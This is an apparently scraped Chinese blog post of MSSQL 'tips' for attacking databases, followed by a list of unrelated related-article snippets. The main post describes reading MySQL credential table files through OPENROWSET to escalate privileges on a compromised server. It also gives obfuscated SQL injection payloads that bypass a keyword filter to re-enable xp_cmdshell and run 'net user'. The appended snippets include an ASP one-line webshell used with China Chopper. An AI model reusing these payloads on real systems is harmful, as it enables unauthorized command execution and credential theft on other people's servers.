MSSQL 小技巧

Title:MSSQL 小技巧  --2012-12-31 11:29

1.

某日一个MSSQL 2008降权,想用MYSQL 3306外联提权,无ROOT密码,遂读取MYSQL文件,导出。

MSSQL 读取二进制/EXE/dat等文件

参考 http://hi.baidu.com/_ccsec/item/be4f68481bf3c8ba61d7b90e

--drop table tbldata;

--Create table tblData(FileId int,FileData varbinary(max));

--Insert into tblData (FileId, FileData) SELECT 1, BulkColumn FROM OPENROWSET(BULK N‘C:\Program Files\MySQL\MySQL Server 5.5\data\mysql\user.frm‘, SINGLE_BLOB) AS Document;

--select * from tbldata

<1>

cd "C:\Program Files\MySQL\MySQL Server 5.5\bin"

mysqld.exe --skip-grant-tables

<2>

读取三文件,修改为其他表名,查询之...

2.

某日鼓捣某站,MSSQL 2005,SA权限,遂开启XP_CMDSHELL,但是XP_CMDSHELL作为关键字被拦截,测试可以简写开启,绕过...

//能够匹配成xp_cmdshell即可...

以下两种不同的方法:

<1>

ExECuTe/**/sp_configure/**/‘show%%advanced%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘xp_cMd%‘,/**/1;RECONFIGURE;--

ExECuTe/**/sp_configure/**/‘show%%%%%%advanced%%%%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘%%%%%%%%xp_cMd%%%%%%‘,/**/1;RECONFIGURE;--

ExECuTe/**/sp_configure/**/‘show%%advanced%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘xp_cMd%el%‘,/**/1;RECONFIGURE;--

<2>//这个是常用的...

declare/**/@a/**/varchar(100)/**/set/**/@a=0x6d61737465722e64626f2e78705f636d647368656c6c declare @b varchar(20)set @b=0x6e65742075736572;eXEC/**/@a/**/@b

时间: 2024-10-13 00:12:59

MSSQL 小技巧的相关文章

&nbsp; 中国菜刀使用方法以及小技巧

相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库. 服务端: 在服务端运行的代码如下: PHP: ASP: <%eval request("pass")%&g

Oracle中ID的自动增加以及获取系统时间的小技巧

引自http://blog.csdn.net/lejuo/article/details/4479065 ID自动增加,就像MS- SQL Server里面创建表格时,给表的主键设置为自动增加一样. 在Oracle里面,通过如下的SQL语句实现:(plsql可以直接在sequence创建) -- Create sequence create sequence MSG_IN_ID_SEQminvalue 1maxvalue 999999999999999999999999999start with

数据库大师成长日记:巧用SQL语句,小技巧解决大问题!

朋友们,我们在写SQL脚本的时候,可能一些看起来不起眼的小问题.却让我们非常头疼.比如我们要写一个备份数据库的脚本,如果我们对服务器的硬盘分区和使用情况很了解,备份当然没有问题,但如果我们不知道服务器硬盘如何分区.每个分区还有多少空间可用的情况下,您写的备份语句可能就不好执行了. 下面,我就日常我们可能会碰到的一些"大问题",通过简单的SQL脚本进行实现. 查看硬盘分区与可用空间 这个通过调用master数据库下面的存储过程xp_fixeddrives很容易实现. EXEC maste

做预解释题的一点小方法和小技巧

在JavaScript中的函数理解中预解释是一个比较难懂的话题.原理虽然简单,寥寥数言,但其内涵却有深意,精髓难懂.如何在轻松活跃的头脑中将它学会,现在针对我在学习中的一点小窍门给大家分享一下,希望能给大家一些帮助: 万事需遵循"原理"--"预解释"无节操和"this"指向:(可先看例题解析然后结合原理进行学习) (感谢蕾蕾老师给归纳的预解释无节操原理:) 如果函数传参数则先于以下执行,就相当于在函数私有作用域下var了一个变量:根据作用域原理,

给你一个云端的大脑01:印象笔记小技巧

我在上课时,很多学员们给我的反馈都是:老师你讲的太精彩啦,但我记不住.我最重视的就是学员的反馈,因为我是一个完美主义者,凡事既然做就要做到最好.而学员就像我的一面镜子,反馈是我改进的方向. 很久以前,我听到这样的反馈第一反应就是自己还是讲得不够好,但后来我的讲课都能hold住全场300多人的时候,我发现这个反馈仍然频繁出现,这不是我的问题而是学员们不会学习的问题,这样的学员在工作中也是缺乏自我培养的能力. 所以从今天起,我的平台又加入一个主题:给你一个云端的大脑.告诉你如何记笔记,如何整理大脑记

思科命令配置小技巧三:alias 命令

大家都用过手机上的快捷拨号设置 思科设备是否支持命令的快捷键定义呢 答案是肯定的 suzhouxiaoniu(config)#alias exec xx show ip inter bri  xx是自定义的快捷键名称,可以是数字 suzhouxiaoniu#xx 直接敲定义好的名称Interface                  IP-Address      OK? Method Status                ProtocolFastEthernet1/0          

思科命令配置小技巧四:用ACL控制debug 输出

使用debug命令可以帮助我们TS,但是使用debug命令往往会输出一大堆信息,很多是我们不需要用的,也会造成CPU高负荷,这种情况下我们可以限制debug的输出 可以应用ACL到debug以限定仅输出要求的debug信息. 如仅查看从1.1.1.1到1.1.1.2的ICMP包: Router(config)# access-list 100 permit icmp host 1.1.1.1 host 1.1.1.2 Router# debug ip packet detail 100 思科命令

在Axure中使用FontAwesome替换你的网站图标[axure小技巧]

你是不是还在为你的网站做一个很小的图标而忙碌着?你是不是还在为找一个图标导出百度或者谷歌?你有没有想过可以用字体来做一个图标代替普通的图片图标?这两天给公司做案例,由于自己又对设计不熟悉,寻找图标的苦差可不是很好做.同事分享了一个用字体代替图片做网站图标的资源,在此非常感谢!Font Awesome,原只为Bootstrap而设计的字体图标,不过,现在你可以单独用它来为你的网站工作.丢掉图片图标吧,跟我一起来用Font Awesome. 使用方法: 1. 下载 Font Awesome 官方网站

Fiddler小技巧-测试上传文件接口&多参数并传情况

写了多年的API了,fidder还真是方便至极相对于postman来说. 两种常用方式: 抓包:app通过代理方式,就可以在pc端看到fidder的请求了 因为会监控好多跟我们需要的没关系的HTTP请求, 就要开启过滤了 主动调试API&上传文件参数&其它参数 拷贝点击"upload file"上传之后自动生成的body然后修改: ---------------------------acebdf13572468 Content-Disposition: form-da